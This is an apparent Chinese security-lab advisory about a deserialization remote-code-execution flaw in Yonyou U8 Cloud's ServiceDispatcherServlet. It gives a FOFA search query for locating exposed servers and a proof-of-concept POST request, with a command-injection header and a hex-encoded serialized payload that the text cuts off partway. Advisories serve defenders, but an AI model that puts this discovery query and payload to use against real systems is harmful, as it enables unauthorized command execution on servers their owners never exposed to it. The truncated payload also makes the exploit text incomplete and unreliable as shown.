漏洞预警用友U8 cloud servicedispatcher 反序列化rce漏洞

融云攻防实验室 · 公众号 · · 2024-04-24 08:02

0x01 阅读须知融云安全的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！！！0x02 漏洞描述用友U8 cloud servicedispatcher 存在反序列化rce漏洞。0x03 漏洞复现fofa-query: body="请下载新版UClient"1.执行poc进行echo，得到结果POST /ServiceDispatcherServlet HTTP/1.1Host: Cmd: {{rce}}User-Agent: Mozilla/5.0{{hex_decode("000039747271890176a5709d6c0244802063787e59bea348a7c04bbd6df6555e6803e56d4ee373cc6385ed048fc0875d7d1062a89b7da7a31509cea3324035c82167a78c1f78b1e836e9cc8987336c0501692fe52ac531f4275f9ce0bd2676445051802c927cd9d946ba1d0e5b0522a9fe05108c0417cb8ff41c8265ec1e7dc5ed2b8 ………………………………

原文地址：访问原文地址
快照地址：访问文章快照

分享到微博